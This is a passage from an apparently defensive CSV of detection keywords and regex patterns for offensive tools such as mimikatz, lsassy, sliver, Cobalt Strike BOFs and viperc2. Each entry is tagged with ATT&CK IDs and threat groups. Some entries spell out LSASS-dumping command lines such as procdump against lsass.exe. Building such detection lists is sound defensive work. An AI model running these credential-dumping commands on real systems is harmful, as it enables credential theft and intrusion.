Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55443"
"*privilege::sysenv*",".{0,1000}privilege\:\:sysenv.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55444"
"*privilege::tcb*",".{0,1000}privilege\:\:tcb.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55445"
"*Privileged Accounts - Layers Analysis.txt*",".{0,1000}Privileged\sAccounts\s\-\sLayers\sAnalysis\.txt.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","55446"
"*Privileged Accounts Permissions - Final Report.csv*",".{0,1000}Privileged\sAccounts\sPermissions\s\-\sFinal\sReport\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","55447"
"*Privileged Accounts Permissions - Irregular Accounts.csv*",".{0,1000}Privileged\sAccounts\sPermissions\s\-\sIrregular\sAccounts\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","55448"
"*PrivilegeEscalation*",".{0,1000}PrivilegeEscalation.{0,1000}","offensive_tool_keyword","PrivilegeEscalation","This program is a very short batch file which allows you to run anything with admin rights without prompting user could be related to other tools using privsec methods","T1548.001 - T1548.003 - T1548.008","TA0004 - TA0002","N/A","N/A","Exploitation tool","https://github.com/LouisVallat/PrivilegeEscalation","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55449"
"*PrivilegeEscalation_BypassUserAccountControl_Windows.py*",".{0,1000}PrivilegeEscalation_BypassUserAccountControl_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55450"
"*PrivilegeEscalation_EnumPatchExample_Windows.py*",".{0,1000}PrivilegeEscalation_EnumPatchExample_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55451"
"*PrivilegeEscalation_ExploitationForPrivilegeEscalation_CVE_2021_40449.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_CVE_2021_40449\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55452"
"*PrivilegeEscalation_ExploitationForPrivilegeEscalation_EfsPotato.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_EfsPotato\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55453"
"*PrivilegeEscalation_ExploitationForPrivilegeEscalation_SweetPotato.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_SweetPotato\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55454"
"*PrivilegeEscalation_ExploitationForPrivilegeEscalation_Windows.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55455"
"*PrivilegeEscalation_ProcessInjection_Getsystem.py*",".{0,1000}PrivilegeEscalation_ProcessInjection_Getsystem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55456"
"*Privileger.cpp*",".{0,1000}Privileger\.cpp.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","N/A","8","2","136","32","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z","55457"
"*Privileger.exe*",".{0,1000}Privileger\.exe.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","N/A","8","2","136","32","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z","55458"
"*Privileger-main.*",".{0,1000}Privileger\-main\..{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","N/A","8","2","136","32","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z","55459"
"*Privilegerx64.exe*",".{0,1000}Privilegerx64\.exe.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","N/A","8","2","136","32","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z","55460"
"*Privilegerx86.exe*",".{0,1000}Privilegerx86\.exe.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","N/A","8","2","136","32","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z","55461"
"*PrivKit32*",".{0,1000}PrivKit32.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","55462"
"*PrivKit-main*",".{0,1000}PrivKit\-main.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","55463"
"*Probable-Wordlists*",".{0,1000}Probable\-Wordlists.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","55465"
"*Probable-Wordlists*",".{0,1000}Probable\-Wordlists.{0,1000}","offensive_tool_keyword","Probable-Wordlists","real password lists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","55466"
"*procdump* lsass.exe *.dmp*",".{0,1000}procdump.{0,1000}\slsass\.exe\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","N/A","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","55467"
"*procdump.exe -accepteula -ma lsass.exe*",".{0,1000}procdump\.exe\s\-accepteula\s\-ma\slsass\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","55470"
"*procdump.exe*lsass*",".{0,1000}procdump\.exe.{0,1000}lsass.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1003.001","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55472"
"*procdump/dump_windows.go*",".{0,1000}procdump\/dump_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","55473"
"*procdump_dump*",".{0,1000}procdump_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","55474"
"*procdump_embedded*",".{0,1000}procdump_embedded.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","55475"
"*procdump_path=*",".{0,1000}procdump_path\=.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","55476"
"*procdump64.exe -ma lsass.exe*",".{0,1000}procdump64\.exe\s\-ma\slsass\.exe.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","55478"
"*ProcDumpHandler.py -r *",".{0,1000}ProcDumpHandler\.py\s\-r\s.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","55480"
"*Process injected MessageBox*",".{0,1000}Process\sinjected\sMessageBox.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","55483"
"*Process is not 64-bit, this version of katz won't work yo'!*",".{0,1000}Process\sis\snot\s64\-bit,\sthis\sversion\sof\skatz\swon\'t\swork\syo\'!.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55484"
"*Process is not 64-bit, this version of katz won't work yo'!*",".{0,1000}Process\sis\snot\s64\-bit,\sthis\sversion\sof\skatz\swon\'t\swork\syo\'!.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55485"
"*process must run as NT AUTHORITY\\SYSTEM to dump lsass memory*",".{0,1000}process\smust\srun\sas\sNT\sAUTHORITY\\\\SYSTEM\sto\sdump\slsass\smemory.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","55486"
"*process::exports*",".{0,1000}process\:\:exports.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55487"
"*process::suspend*",".{0,1000}process\:\:suspend.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","55488"
"*process_herpaderping*",".{0,1000}process_herpaderping.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55489"
"*process_imports.cna*",".{0,1000}process_imports\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","N/A","10","10","85","11","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z","55490"
"*process_imports.x64*",".{0,1000}process_imports\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","N/A","10","10","85","11","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z","55491"
"*process_imports_api *.exe*",".{0,1000}process_imports_api\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 